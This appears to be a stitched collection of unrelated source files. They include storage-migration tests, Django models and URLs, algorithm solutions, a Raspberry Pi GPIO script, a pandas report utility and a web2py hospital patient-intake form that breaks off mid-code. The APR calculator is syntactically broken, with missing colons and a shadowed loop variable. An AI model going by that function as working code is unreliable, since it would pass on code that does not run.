assert_that(len(ms_list), equal_to(2))
@patch_cli(output='migrate_-list_none.txt')
def test_get_all_none(self):
ms_list = VNXMigrationSession.get(t_cli())
assert_that(len(ms_list), equal_to(0))
@patch_cli
def test_get_no_session(self):
ms = VNXMigrationSession(10, t_cli())
assert_that(ms.existed, equal_to(False))
assert_that(ms.is_migrating, equal_to(False))
assert_that(ms.is_success, equal_to(True))
@patch_cli
def test_get_lun_not_exists(self):
ms = VNXMigrationSession(1234, t_cli())
assert_that(ms.existed, equal_to(False))
@patch_cli
def test_cancel_migrate(self):
def f():
ms = VNXMigrationSession(0, t_cli())
ms.cancel()
assert_that(f, raises(VNXLunNotMigratingError,
'not currently migrating'))
@patch_cli
def test_cancel_migrate_sync_completed(self):
def f():
ms = VNXMigrationSession(1, t_cli())
ms.cancel()
assert_that(f, raises(VNXLunSyncCompletedError,
'because data sychronization is completed'))
|
994,249 | 5518a9fa27ee3455ca76b9c7e5f42abc34048a22 | from django.db import models
from django.contrib.auth.models import User
from django.contrib.auth import get_user_model
# Create your models here.
class Tag(models.Model):
tagname = models.CharField(max_length=50)
def __str__(self):
return self.tagname
class Question(models.Model):
difficulties = [
('B',"Beginner"),
("E","Easy"),
("M","Medium"),
("H","Hard"),
]
questionName = models.CharField(max_length=100)
difficulty = models.CharField(choices = difficulties, max_length=50)
questionLink = models.URLField(max_length=500)
solutionLink = models.URLField(max_length=500)
summary = models.TextField()
addedBy = models.ForeignKey(get_user_model(), on_delete=models.CASCADE)
addedOn = models.DateTimeField(auto_now=False, auto_now_add=True)
lastModified = models.DateTimeField(auto_now=True, auto_now_add=False)
tags = models.ManyToManyField(Tag)
def __str__(self):
return self.questionName
|
994,250 | a0e5bd3d5480e6ac6d76a92eaf9960fe156584b4 | ## 문제: https://leetcode.com/problems/combination-sum/
## 풀이: dfs, 백트래킹
## Runtime: 32 ms, faster than 99.17% of Python online submissions for Combination Sum.
## sort candidates -> makes possible stop early
class Solution(object):
def combinationSum(self, candidates, target):
results = []
def dfs(cur, cursum, elements, target):
if cursum == target:
results.append(elements[:])
return
for i in range(cur, len(candidates)):
if (cursum+candidates[i]) > target: # early stop (possible due to candidates is sorted, if not sorted array it gives wrong answers)
return
elements.append(candidates[i])
dfs(i, cursum+candidates[i], elements, target)
elements.pop()
candidates.sort() # sort given array
dfs(0, 0, [], target)
return results
|
994,251 | 38272ce20969159475c891746f85c4f6375fbeed | print('-=-=-=-=- Fatorial -=-=-=-=-\n')
num0 = int(input('Número = '))
num = num0
if num0 < 0:
num = - num0
print('O número dado é negativo, continuaremos com seu módulo: |{}| = {}' .format(num0, num))
num0 = num
fat = 1
print('{}! = ' .format(num0), end='')
while num >= 1:
fat = fat * num
print('{}' .format(num), end='')
print(' x ' if num > 1 else '', end='')
num += -1
print(' = {}' .format(fat))
'''
if i == '1':
print('{} + {} = {}' .format(num1, num2, num1 + num2))
elif i == '2':
print('{} - {} = {}' .format(num1, num2, num1 - num2))
elif i == '3':
print('{} x {} = {}' .format(num1, num2, num1 * num2))
else:
print('{} % {} = {}' .format(num1, num2, num1 / num2))
''' |
994,252 | e0ec4bac6cc1742d5a4e1f313e4547bf7cd3b198 | def calculate_apr(principal, interest_rate, years):
# Condition to check if all the values entered are non-negative
if principal >= 0 and interest_rate >= 0 and years >= 0
p = principal
i = interest_rate
y = years
# Condition to check if the entered values are what they are supposed to be
# prinicipal and interest_rate can be float or int, but years should only be int
if((isinstance(p,float) or isinstance(p, int)) and (isinstance(i,float) or isinstance(i, int)) and isinstance(y, int))
for i in range(years):
principal = principal * (1 + interest_rate)
return f'{principal}'
else:
return False;
|
994,253 | 29ae7e7f96b95ee9f78b443039779534840e19f5 | from setup import BASE_DIR
from setup import ENGINE
from setup import DataFrame
from setup import datetime
from setup import pd
from setup import re
"""Used for loading stop words and input files, and for writing to export files."""
def load_stop_words() -> list:
"""Load the stop words compiled manually from previous reports. This file should be maintained over time and is expected to grow."""
with open(f'{ENGINE}/stop_words.txt', 'r') as i:
stop_words = i.read().splitlines()
stop_words = list(map(lambda x: x.upper(), stop_words)) # Force all stop words to UPPER case.
return stop_words
def make_stop_words_pattern(stop_words: list) -> re.Pattern:
"""Create a long Regex pattern from the stop words, used for quick conditional checking."""
escaped = [re.escape(i) for i in stop_words] # Escape special characters in Stop Words (e.g., "." becomes "\.").
stop_words_string = '|'.join(escaped) # Use the join method to create one string (separated by "or" operator, "|").
pattern = re.compile(stop_words_string)
return pattern
def to_upper(df: DataFrame) -> DataFrame:
"""Force all columns to upper case."""
return df.apply(lambda x: x.str.upper() if x.dtype == 'object' else x)
def strip_columns(df: DataFrame) -> DataFrame:
"""Strip DataFrame columns of trailing whitespace."""
return df.apply(lambda x: x.str.strip() if x.dtype == 'object' else x)
def prepare_input_df(df: DataFrame) -> DataFrame:
"""Apply generic preparation to each DataFrame."""
df = df.fillna('') # Fill np.nan values with blanks ("").
df = to_upper(df) # Force case to UPPER for all columns.
df = strip_columns(df) # Remove trailing whitespace.
return df
def get_flat_file_data(kind: str, server: str='PROD', ID: str='42') -> DataFrame:
"""Load source files for customers data and vendor data, and apply initial preparations to the file. Filename format is not expected to change, except for server and ID parameters."""
k = {
'c': 'customer_data_{0}_{1}_.csv',
'b': 'vendor_data_{0}_{1}_.csv'
}
f = k[kind].format(server, ID)
df = pd.read_csv(f'{BASE_DIR}/{f}', encoding='UTF-8')
df = prepare_input_df(df)
return df
def get_export_columns(kind: str) -> dict:
"""Build a mapping of the working DataFrame column names, and the "cleaned" version of the same."""
c = {
'u': {
'vendor_name': 'Vendor Name',
'number': 'Number',
'name': 'Name',
'assoc': 'Assocciated'
},
'm': {
'email_address': 'Email Address',
'first_name': 'First Name',
'last_name': 'Last Name'
}
}
columns = c['u'] # Because the matched DataFrame has all the same columns
if kind == 'm': columns.update(c['m']) # as unmatched DataFrame, we use the dict.update() method
return columns # to extend the columns of the unmatched DataFrame.
def prepare_output_df(df: DataFrame, kind: str) -> DataFrame:
"""Apply some minor transformations to the export """
columns = get_export_columns(kind)
to_drop = list(filter(lambda x: x not in columns.keys(), df.columns.to_list())) # For any columns not in the get_export_columns()
df = df.drop(columns=to_drop) # mapping, drop them from the DataFrame.
df = df.rename(columns=columns)
return df
def create_report(m_df: DataFrame, u_df: DataFrame, server: str='JEFF', ID: str='11', date=datetime.now().strftime('%Y%m%d %H%M%S')):
"""Make the actual reports.
m_df := Matched DataFrame.
u_df := Unmatched DataFrame."""
m_df = prepare_output_df(m_df, 'm')
u_df = prepare_output_df(u_df, 'u')
with pd.ExcelWriter(f'{BASE_DIR}/report_{server}_{ID}_{date}.xlsx') as o:
m_df.to_excel(o, sheet_name='Matched', index=False)
u_df.to_excel(o, sheet_name='Unmatched', index=False)
STOP_WORDS = load_stop_words() # Load the stop words into a CONSTANT list. This will be used later.
STOP_WORDS_PATTERN = make_stop_words_pattern(STOP_WORDS) # Turn the stop words into a CONSTANT pattern. This will be used later. |
994,254 | 28756cfbb1db8223d1fe0d6036f858459eff19e7 | # -*- coding: utf-8 -*-
import RPi.GPIO as GPIO
import time
a = 0.5
COUNT = 10
PIN1 = 17
PIN2 = 18
GPIO.setmode(GPIO.BCM)
GPIO.setup(PIN1,GPIO.OUT)
GPIO.setup(PIN2,GPIO.OUT)
for _ in xrange(COUNT):
GPIO.output(PIN1,True)
time.sleep(a)
GPIO.output(PIN2,True)
time.sleep(a)
GPIO.output(PIN1,False)
time.sleep(a)
GPIO.output(PIN2,False)
time.sleep(a)
a = a - 0.05
GPIO.cleanup()
|
994,255 | f621828920dac78610549345e0128ba9c2d67047 | from django.urls import path, re_path
from django.conf.urls import url
from . import views
app_name = 'blog'
urlpatterns = [
path('', views.index, name='index'),
re_path(r'^(?P<slug>[\w-]+)/$', views.detail, name='detail')
]
|
994,256 | f12df0f66c266449bb4dc25d2395997b7ddda20a | N = int(input())
A = list(map(int, input().split()))
amax = max(A)
max_idx = A.index(amax)
amin = min(A)
min_idx = A.index(amin)
ans_list = []
if amax*amin < 0:
if abs(amax) >= abs(amin):
for i in range(N):
A[i] += amax
ans_list.append([max_idx+1, i+1])
else:
for i in range(N):
A[i] += amin
ans_list.append([min_idx+1, i+1])
# print(A)
amax = max(A)
amin = min(A)
if amax > 0:
for i in range(N-1):
ans_list.append([i+1, i+2])
elif amin < 0:
for i in range(N-1, 0, -1):
ans_list.append([i+1, i])
print(len(ans_list))
for i in range(len(ans_list)):
print(*ans_list[i])
|
994,257 | 903ffdf15faca6d4304372d4b38fe5908d60089e | # Generated by Django 3.0.3 on 2021-03-19 17:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0014_auto_20210319_2156'),
]
operations = [
migrations.AddField(
model_name='telegram',
name='confirm_paid',
field=models.BooleanField(default=False, help_text='do not fill this field'),
),
migrations.AlterField(
model_name='instagram',
name='confirm_paid',
field=models.BooleanField(default=False, help_text='do not fill this field'),
),
migrations.AlterField(
model_name='whatsapp',
name='confirm_paid',
field=models.BooleanField(default=False, help_text='do not fill this field'),
),
]
|
994,258 | 931e2020d6d0588ef117ef96c829515537d352b1 | __author__ = 'Mohamed'
import sys
import json
import cgi
def gerar_campos_busca():
campos = FORM(
DIV(_id='div_campos_busca_geral',
*FIELDSET(
LEGEND(_id='lgd_campos_busca_geral',
*'BUSCA'),
INPUT(_type='radio', _id='chk_busca_1', _name='chk_busca'),
'Nome: ',
INPUT(_type='text', _id='nome_busca', _name='nome_busca'),
BR(),
INPUT(_type='radio', _id='chk_busca_2', _name='chk_busca'),
'Nr Registro: ',
INPUT(_type='text', _id='nr_registro_busca', _name='nr_registro_busca'),
BR(),
BR(),
INPUT(_type='submit', _value='BUSCAR', _id='btn_buscar'),
INPUT(_type='hidden', _id='campo_hidden_escolha_busca', _name='campo_hidden_escolha_busca'),
INPUT(_type='hidden', _id='campo_hidden_id_busca', _name='campo_hidden_id_busca')
)
)
)
return campos
def consulta_nome(nome):
linhas = db(db.paciente.nome.like('%' + nome + '%')).select()
return linhas
def consulta_registro(registro):
linhas = db(db.paciente.nr_registro == registro).select()
return linhas
def conta_consulta(dado, selecao):
nr_linhas = ''
query = ''
if selecao == 1:
query = (db.paciente.nome == dado)
nr_linhas = db(query).count()
elif selecao == 2:
query = (db.paciente.nr_registro == dado)
nr_linhas = db(query).count()
return nr_linhas
def carrega_dados():
query = db(db.paciente.id == request.vars.id).select()
for dados in query:
campos = FORM(
DIV(_id='div_geral',
*DIV(
DIV(
FIELDSET(
LEGEND(_id='carregar_lgd_dados_gerais',
*'DADOS GERAIS'
),
'Nr Registro:',
INPUT(_type='hidden', _id='carregar_hidden_nr_registro', _name='carregar_hidden_nr_registro', _value=dados.nr_registro),
INPUT(_id='carregar_nr_registro', _name='carregar_nr_registro', _value=dados.nr_registro),
'Matricula HUGG:',
INPUT(_type='hidden', _id='carregar_hidden_matricula_hugg', _name='carregar_hidden_matricula_hugg', _value=dados.matricula_hugg),
INPUT(_id='carregar_matricula_hugg', _name='carregar_matricula_hugg', _value=dados.matricula_hugg),
BR(),
'Nome: ',
INPUT(_type='hidden', _id='carregar_hidden_nome', _name='carregar_hidden_nome', _value=dados.nome),
INPUT(_id='carregar_nome', _name='carregar_nome', _value=dados.nome),
'Data: ',
INPUT(_type='hidden', _id='carregar_hidden_data', _name='carregar_hidden_data', _value=dados.data),
INPUT(_id='carregar_data', _name='carregar_data', _value=dados.data),
'Ficha Nr: ',
INPUT(_type='hidden', _id='carregar_hidden_ficha_nr', _name='carregar_hidden_ficha_nr', _value=dados.ficha_nr),
INPUT(_id='carregar_ficha_nr', _name='carregar_ficha_nr', _value=dados.ficha_nr),
BR(),
'Enf:',
INPUT(_type='hidden', _id='carregar_hidden_enfermaria', _name='carregar_hidden_enfermaria', _value=dados.enfermaria),
INPUT(_id='carregar_enfermaria', _name='carregar_enfermaria', _value=dados.enfermaria),
'Leito:',
INPUT(_type='hidden', _id='carregar_hidden_leito', _name='carregar_hidden_leito', _value=dados.leito),
INPUT(_id='carregar_leito', _name='carregar_leito', _value=dados.leito),
BR(),
'Idade:',
INPUT(_type='hidden', _id='carregar_hidden_idade', _name='carregar_hidden_idade', _value=dados.idade),
INPUT(_id='carregar_idade', _name='carregar_idade', _value=dados.idade),
'ASA:',
INPUT(_type='hidden', _id='carregar_hidden_asa', _name='carregar_hidden_asa', _value=dados.asa),
INPUT(_id='carregar_asa', _name='carregar_asa', _value=dados.asa),
'Clinica:',
INPUT(_type='hidden', _id='carregar_hidden_clinica', _name='carregar_hidden_clinica', _value=dados.clinica),
INPUT(_id='carregar_clinica', _name='carregar_clinica', _value=dados.clinica),
'SO:',
INPUT(_type='hidden', _id='carregar_hidden_so', _name='carregar_hidden_so', _value=dados.so),
INPUT(_id='carregar_so', _name='carregar_so', _value=dados.so),
DIV(_id='carregar_div_e',
*FIELDSET(
'E:',
INPUT(_type='hidden', _id='carregar_hidden_e', _name='carregar_hidden_e', _value=dados.dados_cadastrais_e),
INPUT(_id='carregar_radio_dados_cadastrais_e_sim',
_type='radio',
_name='carregar_dados_cadastrais_e',
_value='T'),
'sim',
INPUT(_id='carregar_radio_dados_cadastrais_e_nao',
_type='radio',
_name='carregar_dados_cadastrais_e',
_value='F'),
'não',
)
),
'Sexo:',
INPUT(_type='hidden', _id='carregar_hidden_sexo', _name='carregar_hidden_sexo', _value=dados.dados_cadastrais_sexo),
INPUT(_id='carregar_radio_sexo_f',
_type='radio',
_name='carregar_dados_cadastrais_sexo',
_value='F'),
'F',
INPUT(_id='carregar_radio_sexo_m',
_type='radio',
_name='carregar_dados_cadastrais_sexo',
_value='M'),
'M',
BR(),
'Altura:',
INPUT(_type='hidden', _id='carregar_hidden_altura', _name='carregar_hidden_altura', _value=dados.altura),
INPUT(_id='carregar_altura', _name='carregar_altura', _value=dados.altura),
'Peso:',
INPUT(_type='hidden', _id='carregar_hidden_peso', _name='carregar_hidden_peso', _value=dados.peso),
INPUT(_id='carregar_peso', _name='carregar_peso', _value=dados.peso),
'Temp:',
INPUT(_type='hidden', _id='carregar_hidden_temperatura', _name='carregar_hidden_temperatura', _value=dados.temperatura),
INPUT(_id='carregar_temperatura', _name='carregar_temperatura', _value=dados.temperatura),
'Pulso:',
INPUT(_type='hidden', _id='carregar_hidden_pulso', _name='carregar_hidden_pulso', _value=dados.pulso),
INPUT(_id='carregar_pulso', _name='carregar_pulso', _value=dados.pulso),
'Resp.:',
INPUT(_type='hidden', _id='carregar_hidden_respiracao', _name='carregar_hidden_respiracao', _value=dados.respiracao),
INPUT(_id='carregar_respiracao', _name='carregar_respiracao', _value=dados.respiracao),
'PA:',
INPUT(_type='hidden', _id='carregar_hidden_pa', _name='carregar_hidden_pa', _value=dados.pa),
INPUT(_id='carregar_pa', _name='carregar_pa', _value=dados.pa),
HR(),
'Diagnóstico',
INPUT(_type='hidden', _id='carregar_hidden_diagnostico', _name='carregar_hidden_diagnostico', _value=dados.diagnostico),
INPUT(_type='text', _id='carregar_diagnostico', _name='carregar_diagnostico', _value=dados.diagnostico),
'Cirurgia',
INPUT(_type='hidden', _id='carregar_hidden_dados_cirurgia_anterior', _name='carregar_hidden_dados_cirurgia_anterior', _value=dados.dados_cirurgia_anterior),
INPUT(_type='text', _id='carregar_dados_cirurgia_anterior', _name='carregar_dados_cirurgia_anterior', _value=dados.dados_cirurgia_anterior),
HR(),
DIV(_id='carregar_div_respiratorio',
*FIELDSET(
LEGEND('RESPIRATÓRIO',
_id='carregar_lgd_respiratorio'),
TABLE(
TR(
TD(
'Tabagismo',
INPUT(_type='hidden', _id='carregar_hidden_tabagismo', _name='carregar_hidden_tabagismo', _value=dados.tabagismo),
INPUT(_id='carregar_radio_tabag_sim',
_type='radio',
_name='carregar_tabagismo',
_value='T'),
'sim',
INPUT(_id='carregar_radio_tabag_nao',
_type='radio',
_name='carregar_tabagismo',
_value='F'),
'não',
BR(),
'Asma',
INPUT(_type='hidden', _id='carregar_hidden_asma', _name='carregar_hidden_asma', _value=dados.asma),
INPUT(_id='carregar_radio_asma_sim',
_type='radio',
_name='carregar_asma',
_value='T'),
'sim',
INPUT(_id='carregar_radio_asma_nao',
_type='radio',
_name='carregar_asma',
_value='F'),
'não',
BR(),
'Tosse / Expectoração',
INPUT(_type='hidden', _id='carregar_hidden_tosse', _name='carregar_hidden_tosse', _value=dados.tosse),
INPUT(_id='carregar_radio_tosse_sim',
_type='radio',
_name='carregar_tosse',
_value='T'),
'sim',
INPUT(_id='carregar_radio_tosse_nao',
_type='radio',
_name='carregar_tosse',
_value='F'),
'não',
BR(),
'DPOC / Bronquiectasia',
INPUT(_type='hidden', _id='carregar_hidden_dpoc', _name='carregar_hidden_dpoc', _value=dados.dpoc),
INPUT(_id='carregar_radio_dpoc_sim',
_type='radio',
_name='carregar_dpoc',
_value='T'),
'sim',
INPUT(_id='carregar_radio_dpoc_nao',
_type='radio',
_name='carregar_dpoc',
_value='F'),
'não',
BR(),
'BK/Insuf. Respiratória',
INPUT(_type='hidden', _id='carregar_hidden_bk_insuficiencia', _name='carregar_hidden_bk_insuficiencia', _value=dados.bk_insuficiencia),
INPUT(_id='carregar_radio_bk_sim',
_type='radio',
_name='carregar_bk_insuficiencia',
_value='T'),
'sim',
INPUT(_id='carregar_radio_bk_nao',
_type='radio',
_name='carregar_bk_insuficiencia',
_value='F'),
'não',
BR(),
'Derrame pleural / Emplema',
INPUT(_type='hidden', _id='carregar_hidden_derrame_pleural', _name='carregar_hidden_derrame_pleural', _value=dados.derrame_pleural),
INPUT(_id='carregar_radio_der_pleural_sim',
_type='radio',
_name='carregar_derrame_pleural',
_value='T'),
'sim',
INPUT(_id='carregar_radio_der_pleural_nao',
_type='radio',
_name='carregar_derrame_pleural',
_value='F'),
'não',
BR(),
'Cir. Torácica',
INPUT(_type='hidden', _id='carregar_hidden_circunferencia_toraxica', _name='carregar_hidden_circunferencia_toraxica', _value=dados.circunferencia_toraxica),
INPUT(_id='carregar_radio_circ_tor_sim',
_type='radio',
_name='carregar_circunferencia_toraxica',
_value='T'),
'sim',
INPUT(_id='carregar_radio_circ_tor_nao',
_type='radio',
_name='carregar_circunferencia_toraxica',
_value='F'),
'não',
)
)
)
)
),
DIV(_id='carregar_div_cardiovascular',
*FIELDSET(
LEGEND(_id='carregar_lgd_cardiovascular',
*'CARDIOVASCULAR'),
TABLE(
TR(
TD(
'HAS',
INPUT(_type='hidden', _id='carregar_hidden_has', _name='carregar_hidden_has', _value=dados.has),
INPUT(_id='carregar_radio_has_sim',
_type='radio',
_name='carregar_has',
_value='T'),
'sim',
INPUT(_id='carregar_radio_has_nao',
_type='radio',
_name='carregar_has',
_value='F'),
'não',
BR(),
'ICC',
INPUT(_type='hidden', _id='carregar_hidden_icc', _name='carregar_hidden_icc', _value=dados.icc),
INPUT(_id='carregar_radio_icc_sim',
_type='radio',
_name='carregar_icc',
_value='T'),
'sim',
INPUT(_id='carregar_radio_icc_nao',
_type='radio',
_name='carregar_icc',
_value='F'),
'não',
BR(),
'Anglina',
INPUT(_type='hidden', _id='carregar_hidden_anglina', _name='carregar_hidden_anglina', _value=dados.anglina),
INPUT(_id='carregar_radio_anglina_sim',
_type='radio',
_name='carregar_anglina',
_value='T'),
'sim',
INPUT(_id='carregar_radio_anglina_nao',
_type='radio',
_name='carregar_anglina',
_value='F'),
'não',
BR(),
'IAM',
INPUT(_type='hidden', _id='carregar_hidden_iam', _name='carregar_hidden_iam', _value=dados.iam),
INPUT(_id='carregar_radio_iam_sim',
_type='radio',
_name='carregar_iam',
_value='T'),
'sim',
INPUT(_id='carregar_radio_iam_nao',
_type='radio',
_name='carregar_iam',
_value='F'),
'não',
BR(),
'Valvulopalla',
INPUT(_type='hidden', _id='carregar_hidden_valvulopalla', _name='carregar_hidden_valvulopalla', _value=dados.valvulopalla),
INPUT(_id='carregar_radio_valvulopalla_sim',
_type='radio',
_name='carregar_valvulopalla',
_value='T'),
'sim',
INPUT(_id='carregar_radio_valvulopalla_nao',
_type='radio',
_name='carregar_valvulopalla',
_value='F'),
'não',
BR(),
'Marcapasso',
INPUT(_type='hidden', _id='carregar_hidden_marcapasso', _name='carregar_hidden_marcapasso', _value=dados.marcapasso),
INPUT(_id='carregar_radio_marcapasso_sim',
_type='radio',
_name='carregar_marcapasso',
_value='T'),
'sim',
INPUT(_id='carregar_radio_marcapasso_nao',
_type='radio',
_name='carregar_marcapasso',
_value='F'),
'não',
BR(),
'Arritmias',
INPUT(_type='hidden', _id='carregar_hidden_arritmias', _name='carregar_hidden_arritmias', _value=dados.arritmias),
INPUT(_id='carregar_radio_arritmias_sim',
_type='radio',
_name='carregar_arritmias',
_value='T'),
'sim',
INPUT(_id='carregar_radio_arritmias_nao',
_type='radio',
_name='carregar_arritmias',
_value='F'),
'não',
BR(),
'Insuf. Venosa',
INPUT(_type='hidden', _id='carregar_hidden_insuf_venosa', _name='carregar_hidden_insuf_venosa', _value=dados.insuf_venosa),
INPUT(_id='carregar_radio_insuf_venosa_sim',
_type='radio',
_name='carregar_insuf_venosa',
_value='T'),
'sim',
INPUT(_id='carregar_radio_insuf_venosa_nao',
_type='radio',
_name='carregar_insuf_venosa',
_value='F'),
'não',
)
)
)
)
),
BR(),
FIELDSET(
LEGEND(_id='carregar_lgd_outros',
*'Outros'),
DIV(_id='carregar_div_outros_esq',
*TABLE(
TR(
TD(
'Diabetes: ',
INPUT(_type='hidden', _id='carregar_hidden_diabetes', _name='carregar_hidden_diabetes', _value=dados.diabetes),
INPUT(_id='carregar_radio_diabetes_sim',
_type='radio',
_name='carregar_diabetes',
_value='T'),
'sim',
INPUT(_id='carregar_radio_diabetes_nao',
_type='radio',
_name='carregar_diabetes',
_value='F'),
'não',
BR(),
'Hipertireoidismo: ',
INPUT(_type='hidden', _id='carregar_hidden_hipertireoidismo', _name='carregar_hidden_hipertireoidismo', _value=dados.hipertireoidismo),
INPUT(_id='carregar_radio_hipertireoidismo_sim',
_type='radio',
_name='carregar_hipertireoidismo',
_value='T'),
'sim',
INPUT(_id='carregar_radio_hipertireoidismo_nao',
_type='radio',
_name='carregar_hipertireoidismo',
_value='F'),
'não',
BR(),
'Endocrinopalias: ',
INPUT(_type='hidden', _id='carregar_hidden_endocrinopalias', _name='carregar_hidden_endocrinopalias', _value=dados.endocrinopalias),
INPUT(_id='carregar_radio_endocrinopalias_sim',
_type='radio',
_name='carregar_endocrinopalias',
_value='T'),
'sim',
INPUT(_id='carregar_radio_endocrinopalias_nao',
_type='radio',
_name='carregar_endocrinopalias',
_value='F'),
'não',
BR(),
'Cirrose: ',
INPUT(_type='hidden', _id='carregar_hidden_cirrose', _name='carregar_hidden_cirrose', _value=dados.cirrose),
INPUT(_id='carregar_radio_cirrose_sim',
_type='radio',
_name='carregar_cirrose',
_value='T'),
'sim',
INPUT(_id='carregar_radio_cirrose_nao',
_type='radio',
_name='carregar_cirrose',
_value='F'),
'não',
BR(),
'Hepatite A: ',
INPUT(_type='hidden', _id='carregar_hidden_hepatite_a', _name='carregar_hidden_hepatite_a', _value=dados.hepatite_a),
INPUT(_id='carregar_radio_hepa_sim',
_type='radio',
_name='carregar_hepatite_a',
_value='T'),
'sim',
INPUT(_id='carregar_radio_hepa_nao',
_type='radio',
_name='carregar_hepatite_a',
_value='F'),
'não',
BR(),
'Hepatite B: ',
INPUT(_type='hidden', _id='carregar_hidden_hepatite_b', _name='carregar_hidden_hepatite_b', _value=dados.hepatite_b),
INPUT(_id='carregar_radio_hepb_sim',
_type='radio',
_name='carregar_hepatite_b',
_value='T'),
'sim',
INPUT(_id='carregar_radio_hepb_nao',
_type='radio',
_name='carregar_hepatite_b',
_value='F'),
'não',
BR(),
'Hepatite C: ',
INPUT(_type='hidden', _id='carregar_hidden_hepatite_c', _name='carregar_hidden_hepatite_c', _value=dados.hepatite_c),
INPUT(_id='carregar_radio_hepc_sim',
_type='radio',
_name='carregar_hepatite_c',
_value='T'),
'sim',
INPUT(_id='carregar_radio_hepc_nao',
_type='radio',
_name='carregar_hepatite_c',
_value='F'),
'não',
BR(),
'Elilismo: ',
INPUT(_type='hidden', _id='carregar_hidden_elilismo', _name='carregar_hidden_elilismo', _value=dados.elilismo),
INPUT(_id='carregar_radio_elilismo_sim',
_type='radio',
_name='carregar_elilismo',
_value='T'),
'sim',
INPUT(_id='carregar_radio_elilismo_nao',
_type='radio',
_name='carregar_elilismo',
_value='F'),
'não',
BR(),
'HIV / SIDA: ',
INPUT(_type='hidden', _id='carregar_hidden_hiv', _name='carregar_hidden_hiv', _value=dados.hiv),
INPUT(_id='carregar_radio_hiv_sim',
_type='radio',
_name='carregar_hiv',
_value='T'),
'sim',
INPUT(_id='carregar_radio_hiv_nao',
_type='radio',
_name='carregar_hiv',
_value='F'),
'não',
BR(),
'Infecções Oportunistas: ',
INPUT(_type='hidden', _id='carregar_hidden_infeccoes_oportunistas', _name='carregar_hidden_infeccoes_oportunistas', _value=dados.infeccoes_oportunistas),
INPUT(_id='carregar_radio_inf_opor_sim',
_type='radio',
_name='carregar_infeccoes_oportunistas',
_value='T'),
'sim',
INPUT(_id='carregar_radio_inf_opor_nao',
_type='radio',
_name='carregar_infeccoes_oportunistas',
_value='F'),
'não',
)
),
)
),
DIV(_id='carregar_div_outros_centro',
*TABLE(
*TR(
TD(
TD(
'Insuf. Renal: ',
INPUT(_type='hidden', _id='carregar_hidden_insuf_renal', _name='carregar_hidden_insuf_renal', _value=dados.insuf_renal),
INPUT(_id='carregar_radio_insuf_renal_sim',
_type='radio',
_name='carregar_insuf_renal',
_value='T'),
'sim',
INPUT(_id='carregar_radio_insuf_renal_nao',
_type='radio',
_name='carregar_insuf_renal',
_value='F'),
'não',
BR(),
'Hemod. Diálise Peritoneal: ',
INPUT(_type='hidden', _id='carregar_hidden_hemodialise_peritoneal', _name='carregar_hidden_hemodialise_peritoneal', _value=dados.hemodialise_peritoneal),
INPUT(_id='carregar_radio_hemod_sim',
_type='radio',
_name='carregar_hemodialise_peritoneal',
_value='T'),
'sim',
INPUT(_id='carregar_radio_hemod_nao',
_type='radio',
_name='carregar_hemodialise_peritoneal',
_value='F'),
'não',
BR(),
'Distúrbios Hemorrágicos: ',
INPUT(_type='hidden', _id='carregar_hidden_disturbios_hemorragicos', _name='carregar_hidden_disturbios_hemorragicos', _value=dados.disturbios_hemorragicos),
INPUT(_id='carregar_radio_dist_hemo_sim',
_type='radio',
_name='carregar_disturbios_hemorragicos',
_value='T'),
'sim',
INPUT(_id='carregar_radio_dist_hemo_nao',
_type='radio',
_name='carregar_disturbios_hemorragicos',
_value='F'),
'não',
BR(),
'AVC Prévio: ',
INPUT(_type='hidden', _id='carregar_hidden_avc_previo', _name='carregar_hidden_avc_previo', _value=dados.avc_previo),
INPUT(_id='carregar_radio_avc_previo_sim',
_type='radio',
_name='carregar_avc_previo',
_value='T'),
'sim',
INPUT(_id='carregar_radio_avc_previo_nao',
_type='radio',
_name='carregar_avc_previo',
_value='F'),
'não',
BR(),
'D. Psiquiátrica: ',
INPUT(_type='hidden', _id='carregar_hidden_doencas_psiquiatricas', _name='carregar_hidden_doencas_psiquiatricas', _value=dados.doencas_psiquiatricas),
INPUT(_id='carregar_radio_d_psi_sim',
_type='radio',
_name='carregar_doencas_psiquiatricas',
_value='T'),
'sim',
INPUT(_id='carregar_radio_d_psi_nao',
_type='radio',
_name='carregar_doencas_psiquiatrica',
_value='F'),
'não',
BR(),
'D. Neuromuscular: ',
INPUT(_type='hidden', _id='carregar_hidden_doencas_neuromuscular', _name='carregar_hidden_doencas_neuromuscular', _value=dados.doencas_neuromuscular),
INPUT(_id='carregar_radio_d_neuro_musc_sim',
_type='radio',
_name='carregar_doencas_neuromuscular',
_value='T'),
'sim',
INPUT(_id='carregar_radio_d_neuro_musc_nao',
_type='radio',
_name='carregar_doencas_neuromuscular',
_value='F'),
'não',
BR(),
'D. Reumática: ',
INPUT(_type='hidden', _id='carregar_hidden_doencas_reumaticas', _name='carregar_hidden_doencas_reumaticas', _value=dados.doencas_reumaticas),
INPUT(_id='carregar_radio_d_reuma_sim',
_type='radio',
_name='carregar_doencas_reumaticas',
_value='T'),
'sim',
INPUT(_id='carregar_radio_d_reuma_nao',
_type='radio',
_name='carregar_doencas_reumaticas',
_value='F'),
'não',
BR(),
'Alt. Neurológica: ',
INPUT(_type='hidden', _id='carregar_hidden_alteracao_neurologica', _name='carregar_hidden_alteracao_neurologica', _value=dados.alteracao_neurologica),
INPUT(_id='carregar_radio_alt_neuro_sim',
_type='radio',
_name='carregar_alteracao_neurologica',
_value='T'),
'sim',
INPUT(_id='carregar_radio_alt_neuro_nao',
_type='radio',
_name='carregar_alteracao_neurologica',
_value='F'),
'não',
BR(),
'Hemotransfusão prévia: ',
INPUT(_type='hidden', _id='carregar_hidden_hemotransfusao_previa', _name='carregar_hidden_hemotransfusao_previa', _value=dados.hemotransfusao_previa),
INPUT(_id='carregar_radio_hemo_prev_sim',
_type='radio',
_name='carregar_hemotransfusao_previa',
_value='T'),
'sim',
INPUT(_id='carregar_radio_hemo_prev_nao',
_type='radio',
_name='carregar_hemotransfusao_previa',
_value='F'),
'não',
),
)
)
)
),
DIV(_id='carregar_div_outros_dir',
*TABLE(
TR(
TD(
'Observações Gerais'
)
),
BR(),
TR(
TD(
INPUT(_type="hidden", _id='carregar_hidden_obs_gerais', _name='carregar_hidden_obs_gerais', _value=dados.obs_gerais),
TEXTAREA(_id='carregar_obs_gerais', _name='carregar_obs_gerais')
)
)
)
),
HR(),
'Medicamentos em uso:',
INPUT(_type='hidden', _id='carregar_hidden_medicamentos_em_uso', _name='carregar_hidden_medicamentos_em_uso', _value=dados.medicamentos_em_uso),
